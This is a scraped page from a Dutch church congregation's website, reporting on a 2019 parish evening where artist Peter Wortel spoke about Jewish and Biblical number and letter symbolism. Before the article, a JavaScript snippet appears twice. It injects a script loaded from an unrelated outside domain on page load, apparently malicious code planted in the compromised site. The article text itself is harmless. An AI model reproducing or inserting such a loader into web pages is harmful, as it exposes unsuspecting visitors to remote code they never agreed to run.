;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Leerzame wijkavond - PKN Damwâld

Leerzame wijkavond

Gepubliceerd op: donderdag 14 november 2019

De centrale wijkavond van Hervormd Akkerwoude c.a. trok afgelopen woensdag een groot aantal bezoekers. Zij luisterden met volle aandacht naar beeldend kunstenaar en graficus Peter Wortel. Bijna zijn hele leven is Peter Wortel al met kunst bezig. Zijn interesses zijn architectuur, perspectief, door de mens gemaakte constructies en de relatie van mensen tot deze onderwerpen. Het jodendom speelt ook een belangrijke rol in zijn leven. Opgroeien met een joodse achtergrond: oorlog, onderdrukte woede, frustratie, pijn, die in zijn jongere jaren in zijn kunst tot uitdrukking is gekomen. Het heeft met het verstrijken van de tijd aanleiding gegeven tot een interesse in en een verlangen om de diepte en schoonheid van Joodse en Bijbelse symbolen uit te drukken.

Thema van de avond was het PKN-jaarthema ‘een goed verhaal’. Maar wat is een verhaal? Wat is een goed verhaal? Wat heb je aan een goed verhaal? Kunst opent vaak deuren naar gevoelens en gesprek daarover. Het wijkavondenteam nodigde daarom met alle redenen Peter Wortel uit om het één en ander toe te lichten. Kunstenaars laten vaak speciaal licht op het leven en de samenleving vallen en dat bleek ook bij deze centrale wijkavond. Aan de hand van het reliëf ‘De brandende braamstruik’ en de sculptuur ‘De Leeuw van Sion’ ging Peter Wortel onder meer in op de getallensymboliek en de symbolische betekenis van letters in de Thora en de Bijbel. Daarin zijn getallen en getalswaarden nooit toevallig. God heeft in alle bijbelgetallen, aantallen, jaartallen, leeftijden en getalswaarden een betekenis verborgen en zo heeft ook elke Hebreeuwse letter zijn eigen betekenis. Sommige letters hebben meerdere betekenissen. De positie van een letter in een woord of zin bepaald mede welke symbolische betekenis die een letter uiteindelijk krijgt.

Het werd met recht een levendige bijeenkomst met een ‘goed verhaal’ en een gezellige nazit leverden waardevolle gesprekken op. Ons predikantsechtpaar, al jarenlang bevriend met Peter Wortel, zorgde met gitaar en viool voor een uitstekende begeleiding van de samenzang. Uiteraard mag een groot compliment aan het organiserende wijkavondenteam hier niet achterwege blijven!